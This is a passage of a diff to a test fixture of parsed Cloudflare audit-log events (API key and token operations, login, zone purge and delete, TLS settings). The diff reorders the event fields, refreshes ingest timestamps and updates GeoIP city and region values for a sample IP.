"region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -270,6 +270,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389080230Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"dc0b470f-17b0-4bff-9113-a4fba3bf052c\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T13:42:17Z\"}", + "kind": "event", + "action": "api_key_view", + "id": "dc0b470f-17b0-4bff-9113-a4fba3bf052c", + "type": [ + "info" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -284,20 +298,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776115518Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_view\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"dc0b470f-17b0-4bff-9113-a4fba3bf052c\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"user\"},\"when\":\"2021-11-30T13:42:17Z\"}", - "kind": "event", - "action": "api_key_view", - "id": "dc0b470f-17b0-4bff-9113-a4fba3bf052c", - "type": [ - "info" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -325,14 +325,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -344,6 +344,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389080624Z", + "original": "{\"action\":{\"info\":\"key digest: c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"result\":true,\"type\":\"rotate_API_key\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"8d3396e8-c903-5a66-9421-00fc34570550\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:42:04Z\"}", + "kind": "event", + "action": "rotate_api_key", + "id": "8d3396e8-c903-5a66-9421-00fc34570550", + "type": [ + "change" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -358,20 +372,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776118282Z", - "original": "{\"action\":{\"info\":\"key digest: c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"result\":true,\"type\":\"rotate_API_key\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"8d3396e8-c903-5a66-9421-00fc34570550\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:42:04Z\"}", - "kind": "event", - "action": "rotate_api_key", - "id": "8d3396e8-c903-5a66-9421-00fc34570550", - "type": [ - "change" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -399,14 +399,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -418,6 +418,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081008Z", + "original": "{\"action\":{\"result\":true,\"type\":\"API_key_created\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9320d713-8466-595e-a9f6-73891f89e8a3\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"type\":\"api_key\"},\"when\":\"2021-11-30T13:42:04Z\"}", + "kind": "event", + "action": "api_key_created", + "id": "9320d713-8466-595e-a9f6-73891f89e8a3", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -432,20 +446,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776120928Z", - "original": "{\"action\":{\"result\":true,\"type\":\"API_key_created\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9320d713-8466-595e-a9f6-73891f89e8a3\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"c6b5d100d7ce492d24c5b13160fce1cc0092ce7e8d8430e9f5cf5468868be6f6\",\"type\":\"api_key\"},\"when\":\"2021-11-30T13:42:04Z\"}", - "kind": "event", - "action": "api_key_created", - "id": "9320d713-8466-595e-a9f6-73891f89e8a3", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -473,14 +473,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -492,6 +492,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081383Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ceced925-a34c-4a3e-a3ae-5f35c00cf6c8\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:36:45Z\"}", + "kind": "event", + "action": "token_create", + "id": "ceced925-a34c-4a3e-a3ae-5f35c00cf6c8", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -510,20 +524,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776123539Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ceced925-a34c-4a3e-a3ae-5f35c00cf6c8\",\"interface\":\"\",\"metadata\":{\"token_name\":\"test\",\"token_tag\":\"70b6abc4efe977131126486cdd1c00c5\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:36:45Z\"}", - "kind": "event", - "action": "token_create", - "id": "ceced925-a34c-4a3e-a3ae-5f35c00cf6c8", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -551,14 +551,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -570,6 +570,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389081755Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1034b2fe-abcc-523e-ab47-3d3ea14516fa\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:34:03Z\"}", + "kind": "event", + "action": "login", + "id": "1034b2fe-abcc-523e-ab47-3d3ea14516fa", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -584,20 +598,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776126170Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1034b2fe-abcc-523e-ab47-3d3ea14516fa\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-11-30T13:34:03Z\"}", - "kind": "event", - "action": "login", - "id": "1034b2fe-abcc-523e-ab47-3d3ea14516fa", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -625,14 +625,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -644,6 +644,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389082145Z", + "original": "{\"action\":{\"result\":true,\"type\":\"purge\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fedadd2-dda6-5357-9b08-c231baf1a172\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-17T10:13:46Z\"}", + "kind": "event", + "action": "purge", + "id": "2fedadd2-dda6-5357-9b08-c231baf1a172", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -661,20 +675,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776128849Z", - "original": "{\"action\":{\"result\":true,\"type\":\"purge\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fedadd2-dda6-5357-9b08-c231baf1a172\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-17T10:13:46Z\"}", - "kind": "event", - "action": "purge", - "id": "2fedadd2-dda6-5357-9b08-c231baf1a172", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -697,7 +697,7 @@ ] }, "event": { - "ingested": "2021-12-13T14:40:20.776131494Z", + "ingested": "2021-12-14T14:41:11.389082510Z", "original": "{\"action\":{\"result\":true,\"type\":\"tls_settings_deployed\"},\"actor\":{\"id\":\"1\",\"type\":\"system\"},\"id\":\"2ce6e0db-5527-4870-8f66-8ede1cd38791\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"ciphers\":\"\",\"early_hints\":\"Default\",\"http_2\":\"Enabled\",\"min_tls_version\":\"TLSv1.0\",\"quic\":\"Default\",\"session_tickets\":\"Enabled\",\"tls_13\":\"Default\",\"zero_rtt\":\"Default\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:46.214209Z\"}", "kind": "event", "action": "tls_settings_deployed", 
@@ -762,14 +762,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -781,6 +781,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389082896Z", + "original": "{\"action\":{\"result\":true,\"type\":\"delete\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"79ffe165-ebc7-502e-bf57-2bdba27ab100\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:44Z\"}", + "kind": "event", + "action": "delete", + "id": "79ffe165-ebc7-502e-bf57-2bdba27ab100", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -798,20 +812,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776134148Z", - "original": "{\"action\":{\"result\":true,\"type\":\"delete\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"79ffe165-ebc7-502e-bf57-2bdba27ab100\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-10-10T10:13:44Z\"}", - "kind": "event", - "action": "delete", - "id": "79ffe165-ebc7-502e-bf57-2bdba27ab100", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -839,14 +839,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -858,6 +858,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389083449Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"085982b3-dd56-43cd-97f9-68bfd672eacd\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:04Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "085982b3-dd56-43cd-97f9-68bfd672eacd", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -878,20 +892,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776136950Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"085982b3-dd56-43cd-97f9-68bfd672eacd\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:04Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "085982b3-dd56-43cd-97f9-68bfd672eacd", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -919,14 +919,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -938,6 +938,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389083829Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1d6bb655-9645-495b-bebe-f4537c2f7eaa\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:01Z\"}", + "kind": "event", + "action": "token_revoke", + "id": "1d6bb655-9645-495b-bebe-f4537c2f7eaa", + "type": [ + "deletion" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -958,20 +972,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776139631Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_revoke\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1d6bb655-9645-495b-bebe-f4537c2f7eaa\",\"interface\":\"\",\"metadata\":{\"new_token_status\":\"deleted\",\"old_token_status\":\"active\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:38:01Z\"}", - "kind": "event", - "action": "token_revoke", - "id": "1d6bb655-9645-495b-bebe-f4537c2f7eaa", - "type": [ - "deletion" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
@@ -999,14 +999,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1018,6 +1018,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084197Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_roll\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fc845f5-9180-44c2-b67d-154bce5b220e\",\"interface\":\"\",\"metadata\":{\"new_token_hash\":\"3feb599ff44fa121eeb4989ffdf725cbdfae12ffb73e65131e42290da0dfb45b\",\"old_token_hash\":\"a2c8f6ae8f72f9e46c1448a0d8be12e0946c85c408ce6a55c81f41b78df584c6\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:36:30Z\"}", + "kind": "event", + "action": "token_roll", + "id": "2fc845f5-9180-44c2-b67d-154bce5b220e", + "type": [ + "change" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1038,20 +1052,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776142374Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_roll\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"2fc845f5-9180-44c2-b67d-154bce5b220e\",\"interface\":\"\",\"metadata\":{\"new_token_hash\":\"3feb599ff44fa121eeb4989ffdf725cbdfae12ffb73e65131e42290da0dfb45b\",\"old_token_hash\":\"a2c8f6ae8f72f9e46c1448a0d8be12e0946c85c408ce6a55c81f41b78df584c6\",\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:36:30Z\"}", - "kind": "event", - "action": "token_roll", - "id": "2fc845f5-9180-44c2-b67d-154bce5b220e", - "type": [ - "change" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1079,14 +1079,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1098,6 +1098,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084580Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"fc13c1d1-22ff-4574-a01f-7a3506b93d3a\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:33:55Z\"}", + "kind": "event", + "action": "token_create", + "id": "fc13c1d1-22ff-4574-a01f-7a3506b93d3a", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1116,20 +1130,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776145036Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"fc13c1d1-22ff-4574-a01f-7a3506b93d3a\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read analytics and logs\",\"token_tag\":\"3015871186ce9ce13abf200d2fdd39bb\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:33:55Z\"}", - "kind": "event", - "action": "token_create", - "id": "fc13c1d1-22ff-4574-a01f-7a3506b93d3a", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" 
